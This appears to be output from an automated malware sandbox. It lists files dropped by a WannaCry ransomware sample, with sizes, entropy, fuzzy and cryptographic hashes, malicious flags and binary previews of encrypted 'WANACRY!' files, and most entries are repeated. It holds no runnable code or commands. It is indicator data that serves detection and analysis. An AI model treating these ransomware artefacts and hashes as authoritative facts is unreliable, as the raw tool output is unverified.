                                                                              Preview:WANACRY!........w..J.O{.cr.o...z..?.D.....P.&.].....h?;.. .@...=z......N.......N.).r..... .?J|l.....%.9..1.PR..0....c...j.......s...b_0.+.I.......1...;.d.!Sx.~.Z..|.z.......~v..>.6.....G..0..b...N5J.?.....6.v..._......z..{}...N.E..#..o./..(3.9.AEv.8.=..X..c.....=.......[z....T.....1|....~..Cj.I.@....^..(.O XZ..a....;..m#..^...M...w..GM.....?G..umP....j...RQ.&..R~..fN...H..UGc>./..6...d...`zNO.jT..d.....`.{.........O..'|.F.X....m,:T..*...3.#-.=t..I~<..K..<..d Lo........:.G._..z.b.....=O.3.(.CG.....C".".R...&..x,V..S....@p..gk........K..N..F.7X..zi..*.....Q.(..5M......=w..Gb.&f..TK.a....WRf.".lG.Y.0Y...V..#.....7t.;...-....d............y.D.c...7&4=#Z.X....KN.(\.r.1...zc</.I5?....C..+;G..G..kT.$..+..-..)..1.d.#KId....#...(..KA4.|S.)z.bl..3m..V.g.}......%>._.vig.} ...*gou....R@B..t..K....-wnx...:............a}...9....h.!B..o..m..T...:r...q.......f.?.;.'.zL.......,...0.%.r'..@.M<.8C...^.....+,.u.m .f..uYRL....3_s}..k!:+..M+;.|.8r...o.`..M.b.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16056
                                                                              Entropy (8bit):7.989193237234638
                                                                              Encrypted:false
                                                                              SSDEEP:192:pcIFM3FOnJp5IQAe2xoIPE6hHdPW7ntcwqBTuG+R54xs4GiJBUF+lYUSChZmqIJF:sk+Qo2gWjawLkx9JYYh05zgxMLHpIXe
                                                                              MD5:706BDADCE9B172837EB99A8D90C62211
                                                                              SHA1:9700FA1193EE350994793BD453E90E092DF8ED84
                                                                              SHA-256:55A156B7F4749FEEDD7179EF205F51FA34F8099D35BCAB9DF394DAC6E95A3360
                                                                              SHA-512:92D322D0FA83432C61D57018ADEEA55D36236F4ABB675A6DD7CC7D81D5ECE3B5BDB30348AFE1AAA5076C3FB61C53582438072A79D9A20C969E974A244A7EC48F
                                                                              Malicious:false
                                                                              Preview:WANACRY!........w..J.O{.cr.o...z..?.D.....P.&.].....h?;.. .@...=z......N.......N.).r..... .?J|l.....%.9..1.PR..0....c...j.......s...b_0.+.I.......1...;.d.!Sx.~.Z..|.z.......~v..>.6.....G..0..b...N5J.?.....6.v..._......z..{}...N.E..#..o./..(3.9.AEv.8.=..X..c.....=.......[z....T.....1|....~..Cj.I.@....^..(.O XZ..a....;..m#..^...M...w..GM.....?G..umP....j...RQ.&..R~..fN...H..UGc>./..6...d...`zNO.jT..d.....`.{.........O..'|.F.X....m,:T..*...3.#-.=t..I~<..K..<..d Lo........:.G._..z.b.....=O.3.(.CG.....C".".R...&..x,V..S....@p..gk........K..N..F.7X..zi..*.....Q.(..5M......=w..Gb.&f..TK.a....WRf.".lG.Y.0Y...V..#.....7t.;...-....d............y.D.c...7&4=#Z.X....KN.(\.r.1...zc</.I5?....C..+;G..G..kT.$..+..-..)..1.d.#KId....#...(..KA4.|S.)z.bl..3m..V.g.}......%>._.vig.} ...*gou....R@B..t..K....-wnx...:............a}...9....h.!B..o..m..T...:r...q.......f.?.;.'.zL.......,...0.%.r'..@.M<.8C...^.....+,.u.m .f..uYRL....3_s}..k!:+..M+;.|.8r...o.`..M.b.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):258856
                                                                              Entropy (8bit):7.999357840437757
                                                                              Encrypted:true
                                                                              SSDEEP:6144:nFZ0Jp7esL7t4kirOeJHQnLS5iREyUn0KJaDZ:nFiJosLhWOnLS5aEye0qaDZ
                                                                              MD5:A96E18DA3EB5CF26AC65222F0BCAD03B
                                                                              SHA1:085E278D1D0270F3B5BA87DE9FB5757A1A41BBBC
                                                                              SHA-256:B6976205C785E94ABD504874E14E1CA08F2856E63ABAA9B4A15751AD8F5155DB
                                                                              SHA-512:006C9A0EDEFA226E79F3AC3A194EC8DA6602F7991CD07AC16DCBB882E780544F39C2E3AD31BF2A3B3C62912C890CB3FF540B4524895317C012EC5765401FCC7C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........y.$.Z...xG....QD..z;.u..V....;..m... l $q.`.a....h...f...-~..s.9...\.e|.ipd....&[... ~.,".-._.....z=kN..9...}..O.Nr..<yCk.,....T;.}y.....4.....(.U..{..;7.. 'I?W.`.J.#...<."%.t.o.).....?(7.v.9.fu.6O.....9..fz.Y<.........uC.e.......*..H1f.N..............L.|.K.....6.E9f1.Z.vt3.G./1Q.qO...<5.......s*..."t....n..n......."./.......4..EW..........].......p..[.^.....(....e..'W~........1.c.....c.BQ.C....D.Ra.M$.HZ......A..RE....H..'.?..3z4.F...X*d9..,.G...}........1}..#...{-:.....#..@}...x..t..#p..0^RM+l*.M...K..Q.....(c.|......s....B..H.... .|..,P=..J4h...n\..".`#r.5G..fp_...}.,..{.d.LF@P...,.B.6t....DF7&.......`i.K....!..s!{S...~...]J..../.<GS"<....&X..t...N2.5.....w.!rbu.)&>.....\`..&t...K.h<..J....q.,.......d..."....Yi.....}#......m...;z.v..n..6r.....^.eD..U_....rj..<.G.5.)v.......6T.....o.U.....l....?.H_..%..I..o....1...|"......b.13..s.R....Xi....Z.../.U...n.E.*.....MO.j=..laE......7..O.B.A..o.hq.luw.A9..F.9.'.z1
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):258856
                                                                              Entropy (8bit):7.999357840437757
                                                                              Encrypted:true
                                                                              SSDEEP:6144:nFZ0Jp7esL7t4kirOeJHQnLS5iREyUn0KJaDZ:nFiJosLhWOnLS5aEye0qaDZ
                                                                              MD5:A96E18DA3EB5CF26AC65222F0BCAD03B
                                                                              SHA1:085E278D1D0270F3B5BA87DE9FB5757A1A41BBBC
                                                                              SHA-256:B6976205C785E94ABD504874E14E1CA08F2856E63ABAA9B4A15751AD8F5155DB
                                                                              SHA-512:006C9A0EDEFA226E79F3AC3A194EC8DA6602F7991CD07AC16DCBB882E780544F39C2E3AD31BF2A3B3C62912C890CB3FF540B4524895317C012EC5765401FCC7C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........y.$.Z...xG....QD..z;.u..V....;..m... l $q.`.a....h...f...-~..s.9...\.e|.ipd....&[... ~.,".-._.....z=kN..9...}..O.Nr..<yCk.,....T;.}y.....4.....(.U..{..;7.. 'I?W.`.J.#...<."%.t.o.).....?(7.v.9.fu.6O.....9..fz.Y<.........uC.e.......*..H1f.N..............L.|.K.....6.E9f1.Z.vt3.G./1Q.qO...<5.......s*..."t....n..n......."./.......4..EW..........].......p..[.^.....(....e..'W~........1.c.....c.BQ.C....D.Ra.M$.HZ......A..RE....H..'.?..3z4.F...X*d9..,.G...}........1}..#...{-:.....#..@}...x..t..#p..0^RM+l*.M...K..Q.....(c.|......s....B..H.... .|..,P=..J4h...n\..".`#r.5G..fp_...}.,..{.d.LF@P...,.B.6t....DF7&.......`i.K....!..s!{S...~...]J..../.<GS"<....&X..t...N2.5.....w.!rbu.)&>.....\`..&t...K.h<..J....q.,.......d..."....Yi.....}#......m...;z.v..n..6r.....^.eD..U_....rj..<.G.5.)v.......6T.....o.U.....l....?.H_..%..I..o....1...|"......b.13..s.R....Xi....Z.../.U...n.E.*.....MO.j=..laE......7..O.B.A..o.hq.luw.A9..F.9.'.z1
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):105400
                                                                              Entropy (8bit):7.99842479811402
                                                                              Encrypted:true
                                                                              SSDEEP:3072:6qxkTRQQBOClSnesNll+z14PA7GoRheL23:69T3VlSeyPmVheLI
                                                                              MD5:64CAC74C424EA3209F24DFC22753264F
                                                                              SHA1:2AAC9856A7AF60A71F4F4E24E3362AA1309EC227
                                                                              SHA-256:943076B14280DDBC9262259F5545DFDDADB4B5B5602EC11A573192C0D2CCB3EB
                                                                              SHA-512:F643E8D29A6CD46AAB35F4752842AADF0114898F3A6A85B6AAABB918FCD498B377188D02FCCFCB8374A603035AF841B406129DC042660E9F2538A80BECA5B0C3
                                                                              Malicious:true
                                                                              Preview:WANACRY!....+w......'.h.Am...O.S....$..i.>...........X.P....C.K.Y...:."?.A.....dLi)./.".v...=5dT.Z.._..Hz..TQ%.l...n.Eo'....].....E.B....C..ww.......uG.&.....y.J.......$.k...h...&.d%9s.....8.i...P.......E.b7...z...'\ z./..t.G3.c.(I.K.]..$......]..tE".?o..............7P\.W./z..>X.%...Geg.....E.S.e5..Ok{.6.3.NK.....rm..(#...T]..Lm.(....Cj..S.....m>.e1.....%..t1....V.g....X..@.+1.b....Z..I...R[+.Q.Y.Qn.=].!.j.3;&..3...........TN..6hmu.;,.^.6.X#ww......}...2.vvD0.9>....|..E.`..q.v....g.....K3.Se.C.E.g..@.*...]...yW.w.s.............U..?.a.1.7..v.r6.!jD..........t.{-....S.[.....-%...z.L..xIv8.."...L.\$.r..x...R....5.z..a..[(..7d.-.....i.@T/.6/u..3..#......kI#3...,.\zj.....)c.cz.[ql.Y..O.WA.j......|9N...o t[... .?^Lc.....8g.....T..Af3i...P....z...@..0..p./>,..6.KT...?.>....>.W".c...F...2>.wu..gy.x~-<@.k..$.....y..5E0.&)i.....o..]....^.AH.....'......"g.}......o.x.m..r.v....9K..xDt(KlDT..u...O.C\.8T...3..>..p}^G._f>0...c.r...V...z.t.7..Zt.6.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):105400
                                                                              Entropy (8bit):7.99842479811402
                                                                              Encrypted:true
                                                                              SSDEEP:3072:6qxkTRQQBOClSnesNll+z14PA7GoRheL23:69T3VlSeyPmVheLI
                                                                              MD5:64CAC74C424EA3209F24DFC22753264F
                                                                              SHA1:2AAC9856A7AF60A71F4F4E24E3362AA1309EC227
                                                                              SHA-256:943076B14280DDBC9262259F5545DFDDADB4B5B5602EC11A573192C0D2CCB3EB
                                                                              SHA-512:F643E8D29A6CD46AAB35F4752842AADF0114898F3A6A85B6AAABB918FCD498B377188D02FCCFCB8374A603035AF841B406129DC042660E9F2538A80BECA5B0C3
                                                                              Malicious:true
                                                                              Preview:WANACRY!....+w......'.h.Am...O.S....$..i.>...........X.P....C.K.Y...:."?.A.....dLi)./.".v...=5dT.Z.._..Hz..TQ%.l...n.Eo'....].....E.B....C..ww.......uG.&.....y.J.......$.k...h...&.d%9s.....8.i...P.......E.b7...z...'\ z./..t.G3.c.(I.K.]..$......]..tE".?o..............7P\.W./z..>X.%...Geg.....E.S.e5..Ok{.6.3.NK.....rm..(#...T]..Lm.(....Cj..S.....m>.e1.....%..t1....V.g....X..@.+1.b....Z..I...R[+.Q.Y.Qn.=].!.j.3;&..3...........TN..6hmu.;,.^.6.X#ww......}...2.vvD0.9>....|..E.`..q.v....g.....K3.Se.C.E.g..@.*...]...yW.w.s.............U..?.a.1.7..v.r6.!jD..........t.{-....S.[.....-%...z.L..xIv8.."...L.\$.r..x...R....5.z..a..[(..7d.-.....i.@T/.6/u..3..#......kI#3...,.\zj.....)c.cz.[ql.Y..O.WA.j......|9N...o t[... .?^Lc.....8g.....T..Af3i...P....z...@..0..p./>,..6.KT...?.>....>.W".c...F...2>.wu..gy.x~-<@.k..$.....y..5E0.&)i.....o..]....^.AH.....'......"g.}......o.x.m..r.v....9K..xDt(KlDT..u...O.C\.8T...3..>..p}^G._f>0...c.r...V...z.t.7..Zt.6.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):230936
                                                                              Entropy (8bit):7.999102875750417
                                                                              Encrypted:true
                                                                              SSDEEP:6144:EPxwwLSRMMKzKg1ks5PlwjO3oZlGEt+E1bs:EPxwKSRMMAFmYlwjO3eMQg
                                                                              MD5:383BF9D6BF4B89D3C7AA4C98FD90F871
                                                                              SHA1:5EA5352132CEEC63C3B80C1F222A8DA599CF4917
                                                                              SHA-256:186598B3F07D0B0D2DEADC349739B528CDE517D53AE587722B4B50BCF707C4D5
                                                                              SHA-512:C83BB5DEEE878D450582706E0520A1E77FF59E309310510B56AA9B758BC2338211C7307F321C5EE5D681607DB82D93178D25E3C3BC22098EE83E94BEF6CCBC74
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......,`..`..}8..w...b.....x...........c;7".......l.%-N!.eD..n....nk.<..w.<.L$..Dt...p..+9.{Qp.X..fM..*...F......X'......K.<.a..[.....Xi....I...^.....8.V....'.2.].../O....{.D.!.h...Xe..u......k;%.c.m...C..*.J.'M.oX..a...N...Yd.>X+...}]......5..#................%...~%..Z....n...)J..#._.po...(?=...q......9....+T..C,g..)..e..-1k...IW..]........^..^.l....h..._n....b.I..|Y.. }^W......Zh.h...a....}.....`qB.#.....9 U..7.U,........'...._.C.q...J......9..Z...mo.A..'4.s...e..o?..~Q......9....($#.:.K."O..|.......W...n..3MO.g..,...B>..;_i...X@Ln.H..fA4.{.>..(....u....p..-....1F..5..>...sU|.i..,.@..Q.R|g2.&.s.!.........|e#..K...j.(.)m...fw[.G.9'...Z..k..hF.t...Z..c.h..9d6..k...u.q.{F+.P-..'.,..F.J.K..uH}...$.Y.. ...?.K.n.)Y.[..4K../.kG/b>J..w,9..f.I.../K....c..`..~...R.N.Bl...y.b...G..Z....._AU.4..Z.>.^.].8.:u....0EpO...{..NDb..+jV4..*Jy.......`...4hw}.fX.-4.....B....00c..(W...!8...........G...z.IJ.K4.1.`!q...../B.b.4.f..ph.R...S..w...8.;.|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):230936
                                                                              Entropy (8bit):7.999102875750417
                                                                              Encrypted:true
                                                                              SSDEEP:6144:EPxwwLSRMMKzKg1ks5PlwjO3oZlGEt+E1bs:EPxwKSRMMAFmYlwjO3eMQg
                                                                              MD5:383BF9D6BF4B89D3C7AA4C98FD90F871
                                                                              SHA1:5EA5352132CEEC63C3B80C1F222A8DA599CF4917
                                                                              SHA-256:186598B3F07D0B0D2DEADC349739B528CDE517D53AE587722B4B50BCF707C4D5
                                                                              SHA-512:C83BB5DEEE878D450582706E0520A1E77FF59E309310510B56AA9B758BC2338211C7307F321C5EE5D681607DB82D93178D25E3C3BC22098EE83E94BEF6CCBC74
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......,`..`..}8..w...b.....x...........c;7".......l.%-N!.eD..n....nk.<..w.<.L$..Dt...p..+9.{Qp.X..fM..*...F......X'......K.<.a..[.....Xi....I...^.....8.V....'.2.].../O....{.D.!.h...Xe..u......k;%.c.m...C..*.J.'M.oX..a...N...Yd.>X+...}]......5..#................%...~%..Z....n...)J..#._.po...(?=...q......9....+T..C,g..)..e..-1k...IW..]........^..^.l....h..._n....b.I..|Y.. }^W......Zh.h...a....}.....`qB.#.....9 U..7.U,........'...._.C.q...J......9..Z...mo.A..'4.s...e..o?..~Q......9....($#.:.K."O..|.......W...n..3MO.g..,...B>..;_i...X@Ln.H..fA4.{.>..(....u....p..-....1F..5..>...sU|.i..,.@..Q.R|g2.&.s.!.........|e#..K...j.(.)m...fw[.G.9'...Z..k..hF.t...Z..c.h..9d6..k...u.q.{F+.P-..'.,..F.J.K..uH}...$.Y.. ...?.K.n.)Y.[..4K../.kG/b>J..w,9..f.I.../K....c..`..~...R.N.Bl...y.b...G..Z....._AU.4..Z.>.^.].8.:u....0EpO...{..NDb..+jV4..*Jy.......`...4hw}.fX.-4.....B....00c..(W...!8...........G...z.IJ.K4.1.`!q...../B.b.4.f..ph.R...S..w...8.;.|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):204888
                                                                              Entropy (8bit):7.999081989375643
                                                                              Encrypted:true
                                                                              SSDEEP:6144:rWJPSTcjByjE37jJ8VXHsxNdk1Q0zmO1n+OZWj6j3:rWJPM4QM7jJa3sBkRZWA
                                                                              MD5:BA93F61B88504FF18E2AA890A37AA1CA
                                                                              SHA1:AB6CC8E27A516C4A1E2FB122B232C507436AA0D6
                                                                              SHA-256:B3E30389F6F27989E1F8EED574A37A141E66F0EA68C7AB332B6698936E98CE8C
                                                                              SHA-512:7D13C49CE3F647159FE27F7B3DF95AB2527A637BDBA26DB2F0AFF0506CFC040A6155514BAAA3F4C5E4BE127C760EF4E87ACD88E8DAA091113A91B4A7CF0EF047
                                                                              Malicious:true
                                                                              Preview:WANACRY!........YR..i....4.V.."~..`.........F;...S.zO..$.gkD_H^.tEP~6`..{..r..Ug....?].=..b.LO.7)..+...m... =...`..T..Y..D.3.....^..<u+... ...y....Y.....# H.(..60..7..x..-3..*....!Y.K.?....!1.k.@..{:.h.........'.z)..x..u.J..g*.94.pT;..zCV[.c......,...=).,z......7........m.T.kd4..}X..:.".-.C.yJO...X9.m.&..0..%.....(-J.....|.S..t>...?WE..A.W.svMK....@..(..dXB~..L.......0.`A..13.a.Q.Y.bkZ...&..^p.2..8.....s+!W(..V[X...C........_....2..a....q=.'P..S..H^:].<...^o..U$.u./>.u......{.S.....AF........+^....ZM[M.m2.....,...!b......P.'T.=...(._j~OR[Q.S.<5.,..-Mt....c(...]N..".S........J.'.uH.c.?z../.].^.......D_o. ..../-..#.8.}.r_...hZ...`.......r...d .0..`....L.]y.'..Os.C..[h....f..>.#H.Z....zV~0vp......*...*...r...wk,......i+S..b...';.......Bw?.....ir...g..W...Lt;.a..?0y.A......Sl#..:.S.}.s~...%...a.H@.n.o,g.C.'.K.\!.....}7.p.....=....!..I.B.#....o.5.....sd~b..........T..ey..0W..Z.../K..n.\b.S.>...!Swe....d...'.Y.;....?..8..&............'.N.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):204888
                                                                              Entropy (8bit):7.999081989375643
                                                                              Encrypted:true
                                                                              SSDEEP:6144:rWJPSTcjByjE37jJ8VXHsxNdk1Q0zmO1n+OZWj6j3:rWJPM4QM7jJa3sBkRZWA
                                                                              MD5:BA93F61B88504FF18E2AA890A37AA1CA
                                                                              SHA1:AB6CC8E27A516C4A1E2FB122B232C507436AA0D6
                                                                              SHA-256:B3E30389F6F27989E1F8EED574A37A141E66F0EA68C7AB332B6698936E98CE8C
                                                                              SHA-512:7D13C49CE3F647159FE27F7B3DF95AB2527A637BDBA26DB2F0AFF0506CFC040A6155514BAAA3F4C5E4BE127C760EF4E87ACD88E8DAA091113A91B4A7CF0EF047
                                                                              Malicious:true
                                                                              Preview:WANACRY!........YR..i....4.V.."~..`.........F;...S.zO..$.gkD_H^.tEP~6`..{..r..Ug....?].=..b.LO.7)..+...m... =...`..T..Y..D.3.....^..<u+... ...y....Y.....# H.(..60..7..x..-3..*....!Y.K.?....!1.k.@..{:.h.........'.z)..x..u.J..g*.94.pT;..zCV[.c......,...=).,z......7........m.T.kd4..}X..:.".-.C.yJO...X9.m.&..0..%.....(-J.....|.S..t>...?WE..A.W.svMK....@..(..dXB~..L.......0.`A..13.a.Q.Y.bkZ...&..^p.2..8.....s+!W(..V[X...C........_....2..a....q=.'P..S..H^:].<...^o..U$.u./>.u......{.S.....AF........+^....ZM[M.m2.....,...!b......P.'T.=...(._j~OR[Q.S.<5.,..-Mt....c(...]N..".S........J.'.uH.c.?z../.].^.......D_o. ..../-..#.8.}.r_...hZ...`.......r...d .0..`....L.]y.'..Os.C..[h....f..>.#H.Z....zV~0vp......*...*...r...wk,......i+S..b...';.......Bw?.....ir...g..W...Lt;.a..?0y.A......Sl#..:.S.}.s~...%...a.H@.n.o,g.C.'.K.\!.....}7.p.....=....!..I.B.#....o.5.....sd~b..........T..ey..0W..Z.../K..n.\b.S.>...!Swe....d...'.Y.;....?..8..&............'.N.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):537976
                                                                              Entropy (8bit):7.999682586531215
                                                                              Encrypted:true
                                                                              SSDEEP:12288:w//YM++jh8U9TscsQQGEakRVsKo6Mg94P0TsIMp:wX1++WkTscpl92VUOS8TXMp
                                                                              MD5:3D0B695A76F5A263A928ACC65047F683
                                                                              SHA1:8A570A5000F55FD8A724B04F925CAB360259B313
                                                                              SHA-256:606704AF43714B85D21EDC36AFB150827A9FDAB0F321A9242C0509E6CEA6CE26
                                                                              SHA-512:23C648626CBAC6C5C9CBF2A12CFCF2FAF2BE9A41AC310F12E346B5B53B1E6020C0A65B478F01ED5D02CE6C368C6BD4B9C93DB00584DA2227C9F6210398FD7351
                                                                              Malicious:true
                                                                              Preview:WANACRY!....[{R.\.q5.....K% !DP..EE6.nK...y(I.34...Fs..... `.....0!o.\l.....~....^q.)..@.....A.g.s..><.h...e~.Ty..rt.".Ba..V.....Z...h?3.!...`.....teV.....^X...N...d|.rh.6.3qgzk......3..../.o.....X.9.2...il7A.r.'..I^8..@..y......M.H..CG....X"L4O...u.<....V4..........@.......@......./....p.7....E.........c.....Yta.[C.~5s,..m$u...]..B.eU...)O"n[...g+,.T.....$nR.Mb@....#...k._....}..>.cr~..$.......@N;.U.q.<1...b.....\..SU...!...p....:..E...Q.!.....8.&.o&.s.!D.....B.*..V.;p~..A.o..(..-..&~.FY.HX.[..F.....d=.jQ.....jI...&.g.R.a.2.#......O....../.........0...H^..M&...b.x....bE}.p..K..L..........I..7......E......._.]N.c....t..Q......h..Yf./..M$.....-..Q,.o..n...xSN.c....#.b..5.Uy.~i.'>.27Il.>.!..x"..R.]......].....3... ....D.62...P..~s...V..<..F.&..-z..W1gh8e!.u.w.<M.".........T.L..._U.'.Z..p'"QTkh(,C]....c1w.h...DB.|w.[s.6......1..y......~;j.......w...%.`-vX..{M..D2.....[,o]m5..F.M.=?C...[`.A.Ivc.....mhn.~e...L.7)....;.=..lg."nv.#..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):537976
                                                                              Entropy (8bit):7.999682586531215
                                                                              Encrypted:true
                                                                              SSDEEP:12288:w//YM++jh8U9TscsQQGEakRVsKo6Mg94P0TsIMp:wX1++WkTscpl92VUOS8TXMp
                                                                              MD5:3D0B695A76F5A263A928ACC65047F683
                                                                              SHA1:8A570A5000F55FD8A724B04F925CAB360259B313
                                                                              SHA-256:606704AF43714B85D21EDC36AFB150827A9FDAB0F321A9242C0509E6CEA6CE26
                                                                              SHA-512:23C648626CBAC6C5C9CBF2A12CFCF2FAF2BE9A41AC310F12E346B5B53B1E6020C0A65B478F01ED5D02CE6C368C6BD4B9C93DB00584DA2227C9F6210398FD7351
                                                                              Malicious:true
                                                                              Preview:WANACRY!....[{R.\.q5.....K% !DP..EE6.nK...y(I.34...Fs..... `.....0!o.\l.....~....^q.)..@.....A.g.s..><.h...e~.Ty..rt.".Ba..V.....Z...h?3.!...`.....teV.....^X...N...d|.rh.6.3qgzk......3..../.o.....X.9.2...il7A.r.'..I^8..@..y......M.H..CG....X"L4O...u.<....V4..........@.......@......./....p.7....E.........c.....Yta.[C.~5s,..m$u...]..B.eU...)O"n[...g+,.T.....$nR.Mb@....#...k._....}..>.cr~..$.......@N;.U.q.<1...b.....\..SU...!...p....:..E...Q.!.....8.&.o&.s.!D.....B.*..V.;p~..A.o..(..-..&~.FY.HX.[..F.....d=.jQ.....jI...&.g.R.a.2.#......O....../.........0...H^..M&...b.x....bE}.p..K..L..........I..7......E......._.]N.c....t..Q......h..Yf./..M$.....-..Q,.o..n...xSN.c....#.b..5.Uy.~i.'>.27Il.>.!..x"..R.]......].....3... ....D.62...P..~s...V..<..F.&..-z..W1gh8e!.u.w.<M.".........T.L..._U.'.Z..p'"QTkh(,C]....c1w.h...DB.|w.[s.6......1..y......~;j.......w...%.`-vX..{M..D2.....[,o]m5..F.M.=?C...[`.A.Ivc.....mhn.~e...L.7)....;.=..lg."nv.#..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):95192
                                                                              Entropy (8bit):7.998180016815133
                                                                              Encrypted:true
                                                                              SSDEEP:1536:oJotsLewTIzLfzHXmSyhA6ywp7+6ZYdB5uWjER3MOZ7qPuGYT6PgroB6zWpXD:9tAe6sb3IXywzZYdTuWi3MEGPuDlMB6S
                                                                              MD5:75F1E604208996852A6F8246D2B9FA04
                                                                              SHA1:4D510E9CF4A493F7D6AB984E3C69C7A5FEA398A7
                                                                              SHA-256:26C3869E3F1C3B4044DE47A47B45B642B23C1F84BA3813AAAA36D781AA103F79
                                                                              SHA-512:FEC134CD060F86FDC93D12FFECF48515AC6B00B09AB830DE2839099B3DAA01EA7BC8FF6D76983C8AAA5304054F32ECF6BC47639827BF3273BD3DDBC8B8408A53
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....h.n.Y.qUd....@.g1a.;..d....s.'{.7y#..9.b(...^...J.1..f8f.}...-i..6..g..A......v..bKy{.E&..5......\Ci....%.J..<.J.#v_k../.T^.....W(..s.".B......kq.|-...e........9`.F..,..0.H.........B.m...$.s..Kk+..,.4.".L+a.z.|.%...n.'....sl'....3. ..W.>......r......e..}.M..Vz....Y.D...?.e.y....,...P.S.x...b.l...PM4.d...O..E...u*;j.v...g[......S..@-...s.>......i.$...3.....&...d...p.zu...e~..dvR*.......#......%....Tl....E27.<n.....m...z..&H......."..oY.....4...i&...+...f..U.........VN...s..&...TO.m..3...^2,DN...w.iO.!.......6..T....*l...,.8..a..j.........1....e....>.r...FzR.D.$..tq...0q..L.z.j.8..j...I.;1..{x.YPg..ic..`.mxK.8.6...3......M..R.....\..?."Q4=5z.VZ9.!..y..CiH..o).G.....}n.....T.....O.D..!..c..o.s....l...t...NNh.i..s...X.S...r...,..i.......B.....Oy...6.j....W..j..!...m1..F.$/8.T...._U{X.b..`=.Q..@.%..@]..q4..DY.=bi..Q.*.`.xq....b..=..}K...G'G..Q......]..)Kz.)'.Vm.P....r......u=S.`_v|Lg...!....h..Lq..1/'`.D0.#^..a...j...S.8.R.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):95192
                                                                              Entropy (8bit):7.998180016815133
                                                                              Encrypted:true
                                                                              SSDEEP:1536:oJotsLewTIzLfzHXmSyhA6ywp7+6ZYdB5uWjER3MOZ7qPuGYT6PgroB6zWpXD:9tAe6sb3IXywzZYdTuWi3MEGPuDlMB6S
                                                                              MD5:75F1E604208996852A6F8246D2B9FA04
                                                                              SHA1:4D510E9CF4A493F7D6AB984E3C69C7A5FEA398A7
                                                                              SHA-256:26C3869E3F1C3B4044DE47A47B45B642B23C1F84BA3813AAAA36D781AA103F79
                                                                              SHA-512:FEC134CD060F86FDC93D12FFECF48515AC6B00B09AB830DE2839099B3DAA01EA7BC8FF6D76983C8AAA5304054F32ECF6BC47639827BF3273BD3DDBC8B8408A53
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....h.n.Y.qUd....@.g1a.;..d....s.'{.7y#..9.b(...^...J.1..f8f.}...-i..6..g..A......v..bKy{.E&..5......\Ci....%.J..<.J.#v_k../.T^.....W(..s.".B......kq.|-...e........9`.F..,..0.H.........B.m...$.s..Kk+..,.4.".L+a.z.|.%...n.'....sl'....3. ..W.>......r......e..}.M..Vz....Y.D...?.e.y....,...P.S.x...b.l...PM4.d...O..E...u*;j.v...g[......S..@-...s.>......i.$...3.....&...d...p.zu...e~..dvR*.......#......%....Tl....E27.<n.....m...z..&H......."..oY.....4...i&...+...f..U.........VN...s..&...TO.m..3...^2,DN...w.iO.!.......6..T....*l...,.8..a..j.........1....e....>.r...FzR.D.$..tq...0q..L.z.j.8..j...I.;1..{x.YPg..ic..`.mxK.8.6...3......M..R.....\..?."Q4=5z.VZ9.!..y..CiH..o).G.....}n.....T.....O.D..!..c..o.s....l...t...NNh.i..s...X.S...r...,..i.......B.....Oy...6.j....W..j..!...m1..F.$/8.T...._U{X.b..`=.Q..@.%..@]..q4..DY.=bi..Q.*.`.xq....b..=..}K...G'G..Q......]..)Kz.)'.Vm.P....r......u=S.`_v|Lg...!....h..Lq..1/'`.D0.#^..a...j...S.8.R.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2296
                                                                              Entropy (8bit):7.905666877334874
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkf9HvhtCGyKqCKDfvh75ny2a+Vn14YkdGQskQSgxFXZjKQOb9Ab0o0RbOYZi:oVuGydfphVaA14YQrQXXZ+1Ab0zhi
                                                                              MD5:763EAA3927A2B0002F98E802919B1415
                                                                              SHA1:66ACA36BC69B161BC5292FD306A4421952B8BA95
                                                                              SHA-256:EE857E8CE5E794DC62FC02A0CE360EAE48EA7BCB8E4DE46060E287370A5EA8CE
                                                                              SHA-512:6244F59D9F3126030A9F26258CC69E0F9900B69BA2BC649F5F1EE4A891BA8438F162502AAA2A15AC3A013BC09157BB485E438E955093858FCCDC3E198049A7B4
                                                                              Malicious:false
